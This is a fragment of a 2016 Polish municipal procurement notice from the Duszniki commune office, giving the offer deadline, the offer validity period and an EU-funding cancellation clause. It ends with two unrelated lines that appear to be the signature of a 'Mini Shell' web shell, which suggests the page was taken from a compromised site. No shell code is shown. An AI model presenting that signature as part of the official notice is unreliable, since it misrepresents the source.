<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.07.2016 godzina 10:00, miejsce: Urząd Gminy Duszniki, ul. Sportowa 1, 64-550 Duszniki , Biuro Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com